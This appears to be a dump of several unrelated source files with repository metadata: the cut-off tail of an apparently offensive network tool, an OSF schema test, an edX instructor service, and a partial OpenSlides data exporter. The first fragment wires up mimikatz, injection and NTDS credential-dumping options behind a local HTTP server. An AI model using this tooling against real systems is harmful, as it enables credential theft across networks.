print_error("Please specify a '--pattern' or a '--patternfile'")
sys.exit(1)
if args.patternfile is not None:
for line in args.patternfile.readlines():
line = line.rstrip()
patterns.append(line)
patterns.append(args.pattern)
args.pattern = patterns
if args.mimikatz or args.inject or (args.ntds == 'ninja'):
print_status("Press CTRL-C at any time to exit")
print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
t = Thread(name='HTTPServer', target=server.serve_forever)
t.setDaemon(True)
t.start()
concurrency(hosts)
if args.mimikatz or args.inject or args.ntds == 'ninja':
try:
while True:
sleep(1)
except KeyboardInterrupt:
sys.exit()
| bsd-2-clause | -1,112,329,128,676,382,200 | 41.346763 | 197 | 0.550669 | false |
adlius/osf.io | api_tests/providers/registrations/views/test_registration_provider_schemas.py | 1 | 4142 | import pytest
from api.base.settings.defaults import API_BASE
from osf_tests.factories import (
RegistrationProviderFactory,
AuthUserFactory
)
from osf.models import RegistrationSchema
from waffle.models import Flag
from osf.migrations import update_provider_auth_groups
@pytest.mark.django_db
class TestRegistrationProviderSchemas:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def egap_flag(self):
flag = Flag.objects.get(name='egap_admins')
flag.everyone = True
flag.save()
return flag
@pytest.fixture()
def schema(self):
return RegistrationSchema.objects.get(name='Prereg Challenge', schema_version=2)
@pytest.fixture()
def egap_schema(self):
return RegistrationSchema.objects.get(name='EGAP Registration', schema_version=3)
@pytest.fixture()
def out_dated_schema(self):
reg_schema = RegistrationSchema(name='Prereg Challenge', schema_version=1)
reg_schema.save()
return reg_schema
@pytest.fixture()
def invisible_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Invisible)', schema_version=1, visible=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def inactive_schema(self):
reg_schema = RegistrationSchema(name='Test Schema (Inactive)', schema_version=1, active=False)
reg_schema.save()
return reg_schema
@pytest.fixture()
def provider(self, schema, out_dated_schema, invisible_schema, inactive_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(*[schema, out_dated_schema, invisible_schema, inactive_schema])
provider.save()
return provider
@pytest.fixture()
def provider_with_v2_prereg_only(self, schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(schema)
provider.save()
return provider
@pytest.fixture()
def provider_with_egap_only(self, egap_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(egap_schema)
provider.save()
return provider
@pytest.fixture()
def url(self, provider):
return f'/{API_BASE}providers/registrations/{provider._id}/schemas/'
@pytest.fixture()
def url_with_v2_prereg_only(self, provider_with_v2_prereg_only):
return f'/{API_BASE}providers/registrations/{provider_with_v2_prereg_only._id}/schemas/'
@pytest.fixture()
def url_with_egap_only(self, provider_with_egap_only):
return f'/{API_BASE}providers/registrations/{provider_with_egap_only._id}/schemas/'
def test_registration_provider_with_schema(
self,
app,
url,
schema,
user,
url_with_v2_prereg_only,
url_with_egap_only
):
res = app.get(url, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == schema._id
assert data[0]['attributes']['name'] == schema.name
res = app.get(url_with_v2_prereg_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == schema._id
assert data[0]['attributes']['name'] == schema.name
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_egap_registration_schema(
self,
app,
user,
egap_flag,
egap_schema,
url_with_egap_only
):
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == egap_schema._id
assert data[0]['attributes']['name'] == egap_schema.name
| apache-2.0 | 6,367,725,758,147,988,000 | 29.681481 | 104 | 0.622646 | false |
mitocw/edx-platform | lms/djangoapps/instructor/services.py | 4 | 4998 | """
Implementation of "Instructor" service
"""
import logging
from django.core.exceptions import ObjectDoesNotExist
from django.utils.translation import ugettext as _
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey, UsageKey
import lms.djangoapps.instructor.enrollment as enrollment
from lms.djangoapps.courseware.models import StudentModule
from lms.djangoapps.commerce.utils import create_zendesk_ticket
from lms.djangoapps.instructor.views.tools import get_student_from_identifier
from student import auth
from student.roles import CourseStaffRole
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
class InstructorService(object):
"""
Instructor service for deleting the students attempt(s) of an exam. This service has been created
for the edx_proctoring's dependency injection to cater for a requirement where edx_proctoring
needs to call into edx-platform's functions to delete the students' existing answers, grades
and attempt counts if there had been an earlier attempt.
"""
def delete_student_attempt(self, student_identifier, course_id, content_id, requesting_user):
"""
        Deletes student state for a problem. requesting_user is recorded for the audit trail.
        Takes the following parameters:
- student_identifier is an email or username
- content_id is a url-name of a problem
- course_id is the id for the course
"""
course_id = CourseKey.from_string(course_id)
try:
student = get_student_from_identifier(student_identifier)
except ObjectDoesNotExist:
err_msg = (
'Error occurred while attempting to reset student attempts for user '
u'{student_identifier} for content_id {content_id}. '
'User does not exist!'.format(
student_identifier=student_identifier,
content_id=content_id
)
)
log.error(err_msg)
return
try:
module_state_key = UsageKey.from_string(content_id)
except InvalidKeyError:
err_msg = (
u'Invalid content_id {content_id}!'.format(content_id=content_id)
)
log.error(err_msg)
return
if student:
try:
enrollment.reset_student_attempts(
course_id,
student,
module_state_key,
requesting_user=requesting_user,
delete_module=True,
)
except (StudentModule.DoesNotExist, enrollment.sub_api.SubmissionError):
err_msg = (
'Error occurred while attempting to reset student attempts for user '
u'{student_identifier} for content_id {content_id}.'.format(
student_identifier=student_identifier,
content_id=content_id
)
)
log.error(err_msg)
def is_course_staff(self, user, course_id):
"""
Returns True if the user is the course staff
else Returns False
"""
return auth.user_has_role(user, CourseStaffRole(CourseKey.from_string(course_id)))
def send_support_notification(self, course_id, exam_name, student_username, review_status, review_url=None):
"""
Creates a Zendesk ticket for an exam attempt review from the proctoring system.
Currently, it sends notifications for 'Suspicious" status, but additional statuses can be supported
by adding to the notify_support_for_status list in edx_proctoring/backends/software_secure.py
The notifications can be disabled by disabling the
"Create Zendesk Tickets For Suspicious Proctored Exam Attempts" setting in the course's Advanced settings.
"""
course_key = CourseKey.from_string(course_id)
course = modulestore().get_course(course_key)
if course.create_zendesk_tickets:
requester_name = "edx-proctoring"
email = "[email protected]"
subject = _(u"Proctored Exam Review: {review_status}").format(review_status=review_status)
body = _(
u"A proctored exam attempt for {exam_name} in {course_name} by username: {student_username} "
u"was reviewed as {review_status} by the proctored exam review provider.\n"
u"Review link: {review_url}"
).format(
exam_name=exam_name,
course_name=course.display_name,
student_username=student_username,
review_status=review_status,
review_url=review_url or u'not available',
)
tags = ["proctoring"]
create_zendesk_ticket(requester_name, email, subject, body, tags)
| agpl-3.0 | -2,426,297,679,966,818,000 | 40.65 | 114 | 0.623049 | false |
OpenSlides/OpenSlides | server/openslides/core/export.py | 3 | 69092 | import base64
import re
from collections import defaultdict
from datetime import datetime
from typing import Any
from asgiref.sync import async_to_sync
from django.conf import settings
from django.db import connections
from openslides.mediafiles.models import Mediafile
from openslides.mediafiles.views import use_mediafile_database
from openslides.motions.models import Motion
from openslides.users.views import demo_mode_users, is_demo_mode
from openslides.utils.cache import element_cache
def copy(obj, *attrs):
return {attr: obj[attr] for attr in attrs if attr in obj}
fromisoformat = getattr(datetime, "fromisoformat", None) # type: ignore
def to_unix_time(datetime_str):
if not datetime_str:
return None
if not fromisoformat:
return 0 # Only available with python >=3.7...
return int(fromisoformat(datetime_str).timestamp())
def max_or_zero(iterable):
as_list = list(iterable)
if len(as_list) == 0:
return 0
else:
return max(as_list)
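# Maps OS3 collection strings to the OS4 collection names used when building
# fqids like "motion/42" (see to_fqid below).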
COLLECTION_MAPPING = {
"agenda/item": "agenda_item",
"agenda/list-of-speakers": "list_of_speakers",
"assignments/assignment": "assignment",
"assignments/assignment-option": "option",
"assignments/assignment-poll": "poll",
"assignments/assignment-vote": "vote",
"chat/chat-group": "chat_group",
"core/countdown": "projector_countdown",
"core/projector": "projector",
"core/projector-message": "projector_message",
"mediafiles/mediafile": "mediafile",
"motions/category": "motion_category",
"motions/motion": "motion",
"motions/motion-block": "motion_block",
"motions/motion-change-recommendation": "motion_change_recommendation",
"motions/motion-comment-section": "motion_comment_section",
"motions/motion-option": "option",
"motions/motion-poll": "poll",
"motions/motion-vote": "vote",
"motions/state": "motion_state",
"motions/statute-paragraph": "motion_statute_paragraph",
"motions/workflow": "motion_workflow",
"topics/topic": "topic",
"users/group": "group",
"users/personal-note": "personal_note",
"users/user": "user",
}
PERMISSION_MAPPING = {
"agenda.can_see": "agenda_item.can_see",
"agenda.can_see_internal_items": "agenda_item.can_see_internal",
"agenda.can_manage": "agenda_item.can_manage",
"assignments.can_see": "assignment.can_see",
"assignments.can_manage": "assignment.can_manage",
"assignments.can_nominate_other": "assignment.can_nominate_other",
"assignments.can_nominate_self": "assignment.can_nominate_self",
"chat.can_manage": "chat.can_manage",
"agenda.can_see_list_of_speakers": "list_of_speakers.can_see",
"agenda.can_manage_list_of_speakers": "list_of_speakers.can_manage",
"agenda.can_be_speaker": "list_of_speakers.can_be_speaker",
"mediafiles.can_see": "mediafile.can_see",
"mediafiles.can_manage": "mediafile.can_manage",
"core.can_manage_config": "meeting.can_manage_settings",
"core.can_manage_logos_and_fonts": "meeting.can_manage_logos_and_fonts",
"core.can_see_frontpage": "meeting.can_see_frontpage",
"core.can_see_autopilot": "meeting.can_see_autopilot",
"core.can_see_livestream": "meeting.can_see_livestream",
"core.can_see_history": "meeting.can_see_history",
"motions.can_see": "motion.can_see",
"motions.can_see_internal": "motion.can_see_internal",
"motions.can_manage": "motion.can_manage",
"motions.can_manage_metadata": "motion.can_manage_metadata",
"motions.can_manage_polls": "motion.can_manage_polls",
"motions.can_create": "motion.can_create",
"motions.can_create_amendments": "motion.can_create_amendments",
"motions.can_support": "motion.can_support",
"core.can_see_projector": "projector.can_see",
"core.can_manage_projector": "projector.can_manage",
"core.can_manage_tags": "projector.can_manage",
"users.can_see_extra_data": "user.can_see_extra_data",
"users.can_see_name": "user.can_see",
"users.can_manage": "user.can_manage",
"users.can_change_password": None,
}
PERMISSION_HIERARCHIE = {
"agenda_item.can_manage": ["agenda_item.can_see_internal", "agenda_item.can_see"],
"agenda_item.can_see_internal": ["agenda_item.can_see"],
"assignment.can_manage": ["assignment.can_nominate_other", "assignment.can_see"],
"assignment.can_nominate_other": ["assignment.can_see"],
"assignment.can_nominate_self": ["assignment.can_see"],
"list_of_speakers.can_manage": ["list_of_speakers.can_see"],
"list_of_speakers.can_be_speaker": ["list_of_speakers.can_see"],
"mediafile.can_manage": ["mediafile.can_see"],
"motion.can_manage": [
"motion.can_manage_metadata",
"motion.can_manage_polls",
"motion.can_see_internal",
"motion.can_create",
"motion.can_create_amendments",
"motion.can_see",
],
"motion.can_manage_metadata": ["motion.can_see"],
"motion.can_manage_polls": ["motion.can_see"],
"motion.can_see_internal": ["motion.can_see"],
"motion.can_create": ["motion.can_see"],
"motion.can_create_amendments": ["motion.can_see"],
"motion.can_support": ["motion.can_see"],
"projector.can_manage": ["projector.can_see"],
"user.can_manage": ["user.can_see_extra_data", "user.can_see"],
"user.can_see_extra_data": ["user.can_see"],
}
PROJECTION_DEFAULT_NAME_MAPPING = {
"agenda_all_items": "agenda_all_items",
"topics": "topics",
"agenda_list_of_speakers": "list_of_speakers",
"agenda_current_list_of_speakers": "current_list_of_speakers",
"motions": "motion",
"amendments": "amendment",
"motionBlocks": "motion_block",
"assignments": "assignment",
"users": "user",
"mediafiles": "mediafile",
"messages": "projector_message",
"countdowns": "projector_countdowns",
"assignment_poll": "assignment_poll",
"motion_poll": "motion_poll",
}
class OS4ExporterException(Exception):
pass
class OS4Exporter:
def __init__(self):
self.all_data = async_to_sync(element_cache.get_all_data_list)()
self._all_data_dict = None
self.data: Any = defaultdict(dict)
self.meeting: Any = {"id": 1, "projection_ids": []}
def get_data(self):
self.modify_motion_poll_ids()
self.fill_all_data_dict()
self.set_model("meeting", self.meeting)
self.migrate_agenda_items()
self.migrate_topics()
self.migrate_list_of_speakers()
self.migrate_voting_system()
self.migrate_tags()
self.migrate_chat_groups()
self.migrate_assignments()
self.migrate_mediafiles()
self.migrate_motions()
self.migrate_motion_comment_sections()
self.migrate_motion_blocks()
self.migrate_motion_categories()
self.migrate_motion_change_recommendations()
self.migrate_motion_statute_paragraphs()
self.migrate_motion_states()
self.migrate_motion_workflows()
self.migrate_projector_messages()
self.migrate_projector_countdowns()
self.migrate_personal_notes()
self.migrate_users()
self.migrate_groups()
self.migrate_projectors()
self.migrate_meeting()
# Note: When returning self.all_data one has access to the original data to compare it to the export.
# return {"all": self.all_data, "export": self.to_list_format()}
return self.to_list_format()
def set_model(self, collection, model):
if model["id"] in self.data[collection]:
raise OS4ExporterException(f"Tried to overwrite {collection}/{model['id']}")
self.data[collection][model["id"]] = model
def get_model(self, collection, id):
return self.data[collection][id]
def iter_collection(self, collection):
return self.data[collection].values()
def to_list_format(self):
data = {}
for collection, models in self.data.items():
data[collection] = list(models.values())
return data
def fill_all_data_dict(self):
self._all_data_dict = {}
for collection, models in self.all_data.items():
self._all_data_dict[collection] = {model["id"]: model for model in models}
def get_old_model(self, collection, id):
if not self._all_data_dict:
raise OS4ExporterException("Used too early!")
return self._all_data_dict[collection][id]
def get_collection(self, collection):
return self.all_data.get(collection, [])
def to_fqid(self, *args):
"""takes a {"collection": "..", "id": ..} dict or two params (collection, id) and converts it to an fqid"""
if len(args) == 1:
collection = args[0]["collection"]
id = args[0]["id"]
else:
collection = args[0]
id = args[1]
id = self.to_new_id(collection, id)
return f"{COLLECTION_MAPPING[collection]}/{id}"
def to_new_id(self, collection, id):
if collection == "motions/motion-poll":
id += self.motion_poll_id_offset
elif collection == "motions/motion-option":
id += self.motion_option_id_offset
elif collection == "motions/motion-vote":
id += self.motion_vote_id_offset
return id
def get_generic_reverse_relation(self, this_id, field, collections):
fqids = []
for collection in collections:
for model in self.get_collection(collection):
ids = model.get(field, [])
if this_id in ids:
fqids.append(self.to_fqid(collection, model["id"]))
return fqids
def modify_motion_poll_ids(self):
"""add max_or_zero(assignmentpoll_id) to every motion poll. The same for votes and options."""
# poll
self.motion_poll_id_offset = max_or_zero(
[x["id"] for x in self.get_collection("assignments/assignment-poll")]
)
self.motion_option_id_offset = max_or_zero(
[x["id"] for x in self.get_collection("assignments/assignment-option")]
)
self.motion_vote_id_offset = max_or_zero(
[x["id"] for x in self.get_collection("assignments/assignment-vote")]
)
for motion_poll in self.get_collection("motions/motion-poll"):
motion_poll["id"] += self.motion_poll_id_offset
for motion_option in self.get_collection("motions/motion-option"):
motion_option["id"] += self.motion_option_id_offset
motion_option["poll_id"] += self.motion_poll_id_offset
for motion_vote in self.get_collection("motions/motion-vote"):
motion_vote["id"] += self.motion_vote_id_offset
motion_vote["option_id"] += self.motion_option_id_offset
self.poll_id_counter = (
max_or_zero([x["id"] for x in self.get_collection("motions/motion-poll")])
+ 1
)
self.option_id_counter = (
max_or_zero([x["id"] for x in self.get_collection("motions/motion-option")])
+ 1
)
self.vote_id_counter = (
max_or_zero([x["id"] for x in self.get_collection("motions/motion-vote")])
+ 1
)
def migrate_agenda_items(self):
for old in self.get_collection("agenda/item"):
new = copy(
old,
"id",
"item_number",
"comment",
"closed",
"is_internal",
"is_hidden",
"level",
"weight",
"parent_id",
)
new["type"] = {1: "common", 2: "internal", 3: "hidden"}[old["type"]]
new["duration"] = old.get("duration", 0)
new["content_object_id"] = self.to_fqid(old["content_object"])
new["child_ids"] = [
x["id"]
for x in self.get_collection("agenda/item")
if x["parent_id"] == old["id"]
]
new["tag_ids"] = old["tags_id"]
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("agenda_item", new)
def migrate_topics(self):
for old in self.get_collection("topics/topic"):
new = copy(
old, "id", "title", "text", "agenda_item_id", "list_of_speakers_id"
)
new["attachment_ids"] = old["attachments_id"]
new["option_ids"] = []
new["tag_ids"] = []
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("topic", new)
def migrate_list_of_speakers(self):
for old in self.get_collection("agenda/list-of-speakers"):
new = copy(old, "id", "closed")
new["content_object_id"] = self.to_fqid(old["content_object"])
new["speaker_ids"] = self.create_speakers(old["speakers"], old["id"])
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("list_of_speakers", new)
def create_speakers(self, speakers, los_id):
ids = []
for old in speakers:
new = copy(
old,
"id",
"note",
"point_of_order",
"user_id",
"weight",
)
new["begin_time"] = to_unix_time(old["begin_time"])
new["end_time"] = to_unix_time(old["end_time"])
if old["marked"]:
new["speech_state"] = "contribution"
elif old["pro_speech"] is True:
new["speech_state"] = "pro"
elif old["pro_speech"] is False:
new["speech_state"] = "contra"
else:
new["speech_state"] = None
new["list_of_speakers_id"] = los_id
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("speaker", new)
return ids
def migrate_voting_system(self):
# reverse relations option/vote_ids and poll/option_ids are calculated at the end.
self.migrate_votes("assignments/assignment-vote")
self.migrate_votes("motions/motion-vote")
self.migrate_options("assignments/assignment-option")
self.migrate_options("motions/motion-option")
self.migrate_polls("assignments/assignment-poll")
self.migrate_polls("motions/motion-poll")
# motion polls
self.move_votes_to_global_options()
self.calculate_poll_reverse_relations()
def migrate_votes(self, collection):
for old in self.get_collection(collection):
new = copy(
old,
"id",
"weight",
"value",
"user_token",
"option_id",
"user_id",
"delegated_user_id",
)
new["meeting_id"] = 1
self.set_model("vote", new)
def migrate_options(self, collection):
for old in self.get_collection(collection):
new = copy(old, "id", "yes", "no", "abstain", "poll_id")
if "assignment" in collection:
new["content_object_id"] = self.to_fqid("users/user", old["user_id"])
else: # motion
poll = self.get_old_model("motions/motion-poll", old["poll_id"])
new["content_object_id"] = self.to_fqid(
"motions/motion", poll["motion_id"]
)
new["text"] = None
new["weight"] = old.get("weight", 1) # not defined for motion options
new["used_as_global_option_in_poll_id"] = None
new["meeting_id"] = 1
self.set_model("option", new)
def migrate_polls(self, collection):
for old in self.get_collection(collection):
new = copy(
old,
"id",
"title",
"type",
"is_pseudoanonymized",
"pollmethod",
"onehundred_percent_base",
"majority_method",
"votesvalid",
"votesinvalid",
"votescast",
"entitled_users_at_stop",
)
new["state"] = {1: "created", 2: "started", 3: "finished", 4: "published"}[
old["state"]
]
if "assignment" in collection:
new["content_object_id"] = self.to_fqid(
"assignments/assignment", old["assignment_id"]
)
else: # motion
new["content_object_id"] = self.to_fqid(
"motions/motion", old["motion_id"]
)
# these fields are not set by motion polls.
new["description"] = old.get("description", "")
new["min_votes_amount"] = old.get("min_votes_amount", 1)
new["max_votes_amount"] = old.get("max_votes_amount", 1)
new["global_yes"] = old.get("global_yes", False)
new["global_no"] = old.get("global_no", False)
new["global_abstain"] = old.get("global_abstain", False)
new["entitled_group_ids"] = old["groups_id"]
new["backend"] = "long"
new["voted_ids"] = old["voted_id"]
new["global_option_id"] = self.create_global_option(old)
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("poll", new)
def create_global_option(self, poll):
id = self.poll_id_counter
self.poll_id_counter += 1
option = {
"id": id,
"weight": 1,
"text": None,
"yes": poll.get("amount_global_yes", "0.000000"),
"no": poll.get("amount_global_no", "0.000000"),
"abstain": poll.get("amount_global_abstain", "0.000000"),
"poll_id": None,
"used_as_global_option_in_poll_id": poll["id"],
"vote_ids": [],
"content_object_id": None,
"meeting_id": 1,
}
self.set_model("option", option)
return id
def move_votes_to_global_options(self):
for vote in self.iter_collection("vote"):
option = self.get_model("option", vote["option_id"])
poll = self.get_model("poll", option["poll_id"])
if vote["value"] not in poll["pollmethod"]:
                # this vote is not valid for the method -> it must be a global vote.
# remove this vote from this option and add it to the global one.
# Do not care about the reverse relations - they are done later.
vote["option_id"] = poll["global_option_id"]
def calculate_poll_reverse_relations(self):
# poll/option_ids
for poll in self.iter_collection("poll"):
poll["option_ids"] = [
x["id"]
for x in self.iter_collection("option")
if x["poll_id"] == poll["id"]
]
# option/vote_ids
for option in self.iter_collection("option"):
option["vote_ids"] = [
x["id"]
for x in self.iter_collection("vote")
if x["option_id"] == option["id"]
]
def migrate_tags(self):
for old in self.get_collection("core/tag"):
new = copy(old, "id", "name")
new["tagged_ids"] = self.get_generic_reverse_relation(
old["id"],
"tags_id",
(
"agenda/item",
"topics/topic",
"motions/motion",
"assignments/assignment",
),
)
new["meeting_id"] = 1
self.set_model("tag", new)
def migrate_chat_groups(self):
for old in self.get_collection("chat/chat-group"):
new = copy(old, "id", "name")
new["weight"] = old["id"]
new["read_group_ids"] = old["read_groups_id"]
new["write_group_ids"] = old["write_groups_id"]
new["meeting_id"] = 1
self.set_model("chat_group", new)
def migrate_assignments(self):
for old in self.get_collection("assignments/assignment"):
new = copy(
old,
"id",
"title",
"description",
"open_posts",
"default_poll_description",
"number_poll_candidates",
"agenda_item_id",
"list_of_speakers_id",
)
new["phase"] = {0: "search", 1: "voting", 2: "finished"}[old["phase"]]
new["candidate_ids"] = self.create_assignment_candidates(
old["assignment_related_users"], old["id"]
)
new["poll_ids"] = [
x["id"]
for x in self.iter_collection("poll")
if x["content_object_id"] == f"assignment/{old['id']}"
]
new["attachment_ids"] = old["attachments_id"]
new["tag_ids"] = old["tags_id"]
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("assignment", new)
def create_assignment_candidates(self, assignment_candidates, assignment_id):
ids = []
for old in assignment_candidates:
new = copy(old, "id", "weight", "user_id")
new["assignment_id"] = assignment_id
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("assignment_candidate", new)
return ids
def migrate_mediafiles(self):
for old in self.get_collection("mediafiles/mediafile"):
new = copy(
old,
"id",
"title",
"is_directory",
"mimetype",
"pdf_information",
"parent_id",
"list_of_speakers_id",
)
mediafile_blob_data = self.get_mediafile_blob_data(old)
if not mediafile_blob_data:
new["filename"] = old["title"]
new["filesize"] = 0
new["blob"] = None
else:
new["filename"], new["filesize"], new["blob"] = mediafile_blob_data
new["create_timestamp"] = to_unix_time(old["create_timestamp"])
new["access_group_ids"] = old["access_groups_id"]
new["is_public"] = old["inherited_access_groups_id"] is True
inherited_access_groups_id = old["inherited_access_groups_id"]
if inherited_access_groups_id in (True, False):
new["inherited_access_group_ids"] = []
else:
new["inherited_access_group_ids"] = inherited_access_groups_id
new["child_ids"] = [
x["id"]
for x in self.get_collection("mediafiles/mediafile")
if x["parent_id"] == old["id"]
]
new["attachment_ids"] = self.get_generic_reverse_relation(
old["id"],
"attachments_id",
(
"topics/topic",
"motions/motion",
"assignments/assignment",
),
)
new["projection_ids"] = []
# will be set when migrating the meeting
new["used_as_logo_$_in_meeting_id"] = []
new["used_as_font_$_in_meeting_id"] = []
new["meeting_id"] = 1
self.set_model("mediafile", new)
def get_mediafile_blob_data(self, old):
"""
Returns the tuple (filename, filesize, blob) with blob being base64 encoded
in a string. If there is an error or no mediafile, None is returned.
"""
if old["is_directory"]:
return None
try:
db_mediafile = Mediafile.objects.get(pk=old["id"])
except Mediafile.DoesNotExist:
return None
filename = db_mediafile.original_filename
if use_mediafile_database:
with connections["mediafiles"].cursor() as cursor:
cursor.execute(
"SELECT data FROM mediafile_data WHERE id = %s", [old["id"]]
)
row = cursor.fetchone()
if row is None:
return None
data = row[0]
else:
data = db_mediafile.mediafile.open().read()
blob = base64.b64encode(data).decode("utf-8")
return filename, len(data), blob
def migrate_motions(self):
recommendation_reference_motion_ids_regex = re.compile(
r"\[motion:(?P<id>\d+)\]"
)
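        # OS3 references motions in recommendation extensions as
        # "[motion:<id>]"; OS4 uses fqid-style "[motion/<id>]" and tracks the
        # referenced motions in recommendation_extension_reference_ids, which
        # replace_fn below fills in while rewriting the text.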
db_number_values = {}
for motion in Motion.objects.all():
db_number_values[motion.id] = motion.identifier_number
for old in self.get_collection("motions/motion"):
new = copy(
old,
"id",
"title",
"text",
"modified_final_version",
"reason",
"category_weight",
"state_extension",
"recommendation_extension",
"sort_weight",
"state_id",
"recommendation_id",
"category_id",
"statute_paragraph_id",
"agenda_item_id",
"list_of_speakers_id",
)
new["number"] = old["identifier"]
new["number_value"] = db_number_values[old["id"]]
new["sequential_number"] = old["id"]
new["amendment_paragraph_$"] = []
if old["amendment_paragraphs"]:
for i, content in enumerate(old["amendment_paragraphs"]):
new["amendment_paragraph_$"].append(str(i + 1))
new[f"amendment_paragraph_${i+1}"] = content
new["sort_weight"] = old["weight"]
new["created"] = to_unix_time(old["created"])
new["last_modified"] = to_unix_time(old["last_modified"])
new["lead_motion_id"] = old["parent_id"]
new["amendment_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["parent_id"] == old["id"]
]
new["sort_parent_id"] = old["sort_parent_id"]
new["sort_child_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["sort_parent_id"] == old["id"]
]
new["origin_id"] = None
new["derived_motion_ids"] = []
new["forwarding_tree_motion_ids"] = []
new["block_id"] = old["motion_block_id"]
new["submitter_ids"] = self.create_motion_submitters(old["submitters"])
new["supporter_ids"] = old["supporters_id"]
new["poll_ids"] = [
x["id"]
for x in self.iter_collection("poll")
if x["content_object_id"] == f"motion/{old['id']}"
]
new["option_ids"] = [
x["id"]
for x in self.iter_collection("option")
if x["content_object_id"] == f"motion/{old['id']}"
]
new["change_recommendation_ids"] = old["change_recommendations_id"]
new["comment_ids"] = self.create_motion_comments(old["comments"], old["id"])
new["tag_ids"] = old["tags_id"]
new["attachment_ids"] = old["attachments_id"]
new[
"personal_note_ids"
] = [] # will be filled later while migrating personal notes
new["projection_ids"] = []
new["meeting_id"] = 1
new["recommendation_extension_reference_ids"] = []
if new["recommendation_extension"]:
def replace_fn(matchobj):
id = int(matchobj.group("id"))
new["recommendation_extension_reference_ids"].append(f"motion/{id}")
return f"[motion/{id}]"
new[
"recommendation_extension"
] = recommendation_reference_motion_ids_regex.sub(
replace_fn, new["recommendation_extension"]
)
self.set_model("motion", new)
for motion in self.iter_collection("motion"):
motion["referenced_in_motion_recommendation_extension_ids"] = [
x["id"]
for x in self.iter_collection("motion")
if f"motion/{motion['id']}"
in x["recommendation_extension_reference_ids"]
]
def create_motion_submitters(self, submitters):
ids = []
for old in submitters:
new = copy(old, "id", "motion_id", "weight", "user_id")
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("motion_submitter", new)
return ids
def create_motion_comments(self, comments, motion_id):
ids = []
for old in comments:
new = copy(old, "id", "section_id", "comment")
new["motion_id"] = motion_id
new["meeting_id"] = 1
ids.append(old["id"])
self.set_model("motion_comment", new)
return ids
def migrate_motion_comment_sections(self):
for old in self.get_collection("motions/motion-comment-section"):
new = copy(
old,
"id",
"name",
"weight",
)
new["read_group_ids"] = old["read_groups_id"]
new["write_group_ids"] = old["write_groups_id"]
new["comment_ids"] = [
x["id"]
for x in self.iter_collection("motion_comment")
if x["section_id"] == old["id"]
]
new["meeting_id"] = 1
self.set_model("motion_comment_section", new)
def migrate_motion_blocks(self):
for old in self.get_collection("motions/motion-block"):
new = copy(
old, "id", "title", "internal", "agenda_item_id", "list_of_speakers_id"
)
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["motion_block_id"] == old["id"]
]
new["projection_ids"] = []
new["meeting_id"] = 1
self.set_model("motion_block", new)
def migrate_motion_categories(self):
for old in self.get_collection("motions/category"):
new = copy(old, "id", "name", "prefix", "weight", "level", "parent_id")
new["child_ids"] = [
x["id"]
for x in self.get_collection("motions/category")
if x["parent_id"] == old["id"]
]
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["category_id"] == old["id"]
]
new["meeting_id"] = 1
self.set_model("motion_category", new)
def migrate_motion_change_recommendations(self):
for old in self.get_collection("motions/motion-change-recommendation"):
new = copy(
old,
"id",
"rejected",
"internal",
"other_description",
"line_from",
"line_to",
"text",
"motion_id",
)
new["type"] = {0: "replacement", 1: "insertion", 2: "deletion", 3: "other"}[
old["type"]
]
new["creation_time"] = to_unix_time(old["creation_time"])
new["meeting_id"] = 1
self.set_model("motion_change_recommendation", new)
def migrate_motion_statute_paragraphs(self):
for old in self.get_collection("motions/statute-paragraph"):
new = copy(old, "id", "title", "text", "weight")
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["statute_paragraph_id"] == old["id"]
]
new["meeting_id"] = 1
self.set_model("motion_statute_paragraph", new)
def migrate_motion_states(self):
for old in self.get_collection("motions/state"):
new = copy(
old,
"id",
"name",
"recommendation_label",
"allow_support",
"allow_create_poll",
"allow_submitter_edit",
"show_state_extension_field",
"show_recommendation_extension_field",
"workflow_id",
)
if old["css_class"] in (
"grey",
"red",
"green",
"lightblue",
"yellow",
):
new["css_class"] = old["css_class"]
else:
new["css_class"] = "lightblue"
new["restrictions"] = [
{
"motions.can_see_internal": "motion.can_see_internal",
"motions.can_manage_metadata": "motion.can_manage_metadata",
"motions.can_manage": "motion.can_manage",
"is_submitter": "is_submitter",
}[restriction]
for restriction in old["restriction"]
]
new["set_number"] = not old["dont_set_identifier"]
new["merge_amendment_into_final"] = {
-1: "do_not_merge",
0: "undefined",
1: "do_merge",
}[old["merge_amendment_into_final"]]
new["next_state_ids"] = old["next_states_id"]
new["previous_state_ids"] = [
x["id"]
for x in self.get_collection("motions/state")
if old["id"] in x["next_states_id"]
]
new["motion_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["state_id"] == old["id"]
]
new["motion_recommendation_ids"] = [
x["id"]
for x in self.get_collection("motions/motion")
if x["recommendation_id"] == old["id"]
]
new[
"first_state_of_workflow_id"
] = None # will be set when migrating workflows.
new["meeting_id"] = 1
self.set_model("motion_state", new)
